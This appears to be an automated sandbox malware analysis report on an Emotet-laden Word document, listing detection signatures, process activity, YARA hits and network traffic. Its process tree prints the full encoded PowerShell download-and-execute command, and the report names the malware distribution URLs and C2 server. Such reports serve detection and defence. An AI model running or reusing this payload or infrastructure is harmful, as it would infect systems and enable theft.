Loading ...

Play interactive tourEdit tour

Analysis Report vU75ov9BQ4._doc

Overview

General Information

Sample Name:vU75ov9BQ4._doc (renamed file extension from _doc to doc)
Analysis ID:269488
MD5:23c58cef95a66fe76e9f8db34f206997
SHA1:125030e070d57d12a4c5607816defb22100c010c
SHA256:3d2acbb9d9a533e1a74f506659a1dac3b939475bb7b829a8838c712f2fbb5fd4

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Creates processes via WMI
Document contains an embedded VBA with many string operations indicating source code obfuscation
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 7076 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6152 cmdline: powersheLL -e JABPADkAcQBzAGIAcgBrAD0AJwBYAF8AeABmAHYAMwBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBSAEkAYABUAHkAcABgAFIAYABPAHQATwBjAE8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFIAbAB0ADkAawBxAHcAIAA9ACAAJwBYADUAYwBxAHAAaQB6AGgAJwA7ACQASAB4ADYAMwBzAGgANAA9ACcARgA3ADgANAA2AG8AcgAnADsAJABaAGkAcQBxAHAAZgA4AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAJwArACQAUgBsAHQAOQBrAHEAdwArACcALgBlAHgAZQAnADsAJABOAHUAcQBzADIAZQA4AD0AJwBYAGIAcQBuAGYAMABtACcAOwAkAFcAaQBqAGIAegA2AHkAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAEIAQwBMAEkAZQBOAHQAOwAkAEkAMgBfAGwAZgBsAHEAPQAnAGgAdAB0AHAAOgAvAC8AZQBlAHAAdgBuAC4AYwBvAG0ALwBjAG8AbgA3AGUAeAB0AF8AcwB5AG0ANAAwADQALwBhAGcAYgB4AF8AYQAyAG4ANwBfAHAAbQBpAGUAOQB1AGYALwAqAGgAdAB0AHAAOgAvAC8AZQBsAG0AcABhAGoAbwBoAGEAbgAuAGkAcgAvAGMAZwBpAC0AYgBpAG4ALwA5AHoAbABfAGoAaQA4AGIAdwBfAHoAZABoAGEAZAAxAGoANQAyAC8AKgBoAHQAdABwAHMAOgAvAC8AaABhAHYAYQBuAG0AbwBiAGkAbABlAC4AdgBuAC8AdwBwAC0AYQBkAG0AaQBuAC8AZAA1AHgAXwB5AF8ANAB1AG8AdwBlAG8AaQBuAGIALwAqAGgAdAB0AHAAOgAvAC8AYwByAGkAYwBmAGMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGcAbQBkAG0AcQBfADkAdwA4AGwAXwBlAGsALwAqAGgAdAB0AHAAOgAvAC8AbQBqAGsALQBzAC4AYwBvAG0ALgB1AGEALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdwByAF8AcABnAHUAXwBrAHEAZQBnAG8AcgA2AGYALwAnAC4AIgBTAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAeAAyADYAcQBmAG8APQAnAFYAawBtADgAbgA1AGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEcAcwB3AHAANQBpAG0AIABpAG4AIAAkAEkAMgBfAGwAZgBsAHEAKQB7AHQAcgB5AHsAJABXAGkAagBiAHoANgB5AC4AIgBEAGAATwB3AE4ATABgAG8AYABBAEQARgBpAGwAZQAiACgAJABHAHMAdwBwADUAaQBtACwAIAAkAFoAaQBxAHEAcABmADgAKQA7ACQAUABzADcAeQBpAHoAZAA9ACcAVAA0ADYAcgAzAHAAMQAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFoAaQBxAHEAcABmADgAKQAuACIATABlAE4AYABnAFQASAAiACAALQBnAGUAIAAyADUAMgAwADIAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwAnACsAJwBrAGUALQAnACsAJwBJAHQAZQBtACcAKQAoACQAWgBpAHEAcQBwAGYAOAApADsAJABRAHUAaAB4AHgAdABvAD0AJwBSAHkAcgA0AGEAeQBkACcAOwBiAHIAZQBhAGsAOwAkAEEAMwB5AGQAeQBhAHUAPQAnAFAAZQB4AGwAOQBhAHAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBtADEAagA2ADQAMAA9ACcATQB0AHYAYgB4AG4AMgAnAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • X5cqpizh.exe (PID: 6316 cmdline: 'C:\Users\user\AppData\Local\Temp\X5cqpizh.exe' MD5: 9B4D022471DB4AE4520110C102320F2F)
      • rtm.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\wlidres\rtm.exe MD5: 9B4D022471DB4AE4520110C102320F2F)
  • svchost.exe (PID: 6756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4844 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 736 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200818\PowerShell_transcript.305090.Ornom7Ga.20200818013740.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0xff:$s1: powersheLL
  • 0xe5e:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xe5e:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xe5e:$sn3: PowerShell
  • 0x101:$a1: wersheLL -e
C:\Users\user\Documents\20200818\PowerShell_transcript.305090.Ornom7Ga.20200818013740.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1297978189.00000000020A0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.1545894816.0000000000610000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000003.00000002.1298004241.00000000021C1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000004.00000002.1545921940.0000000000631000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results
            Source: C:\Windows\SysWOW64\wlidres\rtm.exeCode function: 4_2_00631D45 CryptDecodeObjectEx,4_2_00631D45
            Source: C:\Users\user\AppData\Local\Temp\X5cqpizh.exeCode function: 3_2_021C2887 FindNextFileW,FindFirstFileW,FindClose,3_2_021C2887
            Source: C:\Windows\SysWOW64\wlidres\rtm.exeCode function: 4_2_00632887 FindNextFileW,FindFirstFileW,FindClose,4_2_00632887
            Source: global trafficDNS query: name: eepvn.com
            Source: global trafficTCP traffic: 192.168.2.5:49744 -> 68.44.137.144:443
            Source: global trafficTCP traffic: 192.168.2.5:49741 -> 112.213.89.143:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.5:49744 -> 68.44.137.144:443
            Source: global trafficHTTP traffic detected: GET /con7ext_sym404/agbx_a2n7_pmie9uf/ HTTP/1.1Host: eepvn.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/ HTTP/1.1Referer: http://68.44.137.144/qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/Content-Type: multipart/form-data; boundary=---------------------------485667106970012User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 68.44.137.144:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 68.44.137.144
            Source: unknownTCP traffic detected without corresponding DNS query: 68.44.137.144
            Source: unknownTCP traffic detected without corresponding DNS query: 68.44.137.144
            Source: unknownTCP traffic detected without corresponding DNS query: 68.44.137.144
            Source: unknownTCP traffic detected without corresponding DNS query: 68.44.137.144
            Source: unknownTCP traffic detected without corresponding DNS query: 68.44.137.144
            Source: unknownTCP traffic detected without corresponding DNS query: 68.44.137.144
            Source: unknownTCP traffic detected without corresponding DNS query: 68.44.137.144
            Source: unknownTCP traffic detected without corresponding DNS query: 68.44.137.144
            Source: global trafficHTTP traffic detected: GET /con7ext_sym404/agbx_a2n7_pmie9uf/ HTTP/1.1Host: eepvn.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: eepvn.com
            Source: unknownHTTP traffic detected: POST /qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/ HTTP/1.1Referer: http://68.44.137.144/qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/Content-Type: multipart/form-data; boundary=---------------------------485667106970012User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 68.44.137.144:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
            Source: rtm.exe, 00000004.00000002.1549374337.0000000002A1C000.00000004.00000001.sdmp, rtm.exe, 00000004.00000002.1549395932.0000000002A27000.00000004.00000001.sdmpString found in binary or memory: http://68.44.137.144/qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/
            Source: rtm.exe, 00000004.00000002.1546077819.0000000000675000.00000004.00000020.sdmpString found in binary or memory: http://68.44.137.144:443/qgnZOBN0BK/PJgfR62JZfM9zRRd/ij09D/I62Jvqi/jFS58w/
            Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.drString found in binary or memory: http://cricfc.com/wp-admin/gmdmq_9w8l_ek/
            Source: svchost.exe, 00000013.00000002.1548252652.00000205449B0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.drString found in binary or memory: http://eepvn.com/con7ext_sym404/agbx_a2n7_pmie9uf/
            Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.drString found in binary or memory: http://elmpajohan.ir/cgi-bin/9zl_ji8bw_zdhad1j52/
            Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.drString found in binary or memory: http://mjk-s.com.ua/wp-content/wr_pgu_kqegor6f/
            Source: svchost.exe, 00000013.00000002.1548252652.00000205449B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: svchost.exe, 00000013.00000002.1546063953.0000020543E87000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://api.aadrm.com/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://api.onedrive.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://augloop.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://cdn.entity.
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://clients.config.office.net/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://config.edge.skype.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://cortana.ai
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://cr.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://directory.services.
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://graph.windows.net
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://graph.windows.net/
            Source: PowerShell_transcript.305090.Ornom7Ga.20200818013740.txt.1.drString found in binary or memory: https://havanmobile.vn/wp-admin/d5x_y_4uoweoinb/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://lifecycle.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://login.microsoftonline.com/common
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://login.windows.local
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://management.azure.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://management.azure.com/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://messaging.office.com/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://ncus-000.contentsync.
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://officeapps.live.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://onedrive.live.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://settings.outlook.com
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 0542D12B-2FB0-479B-B47E-65E5186AFF24.0.drString found in binary or memory: https://skyapi.live.net/Activity/
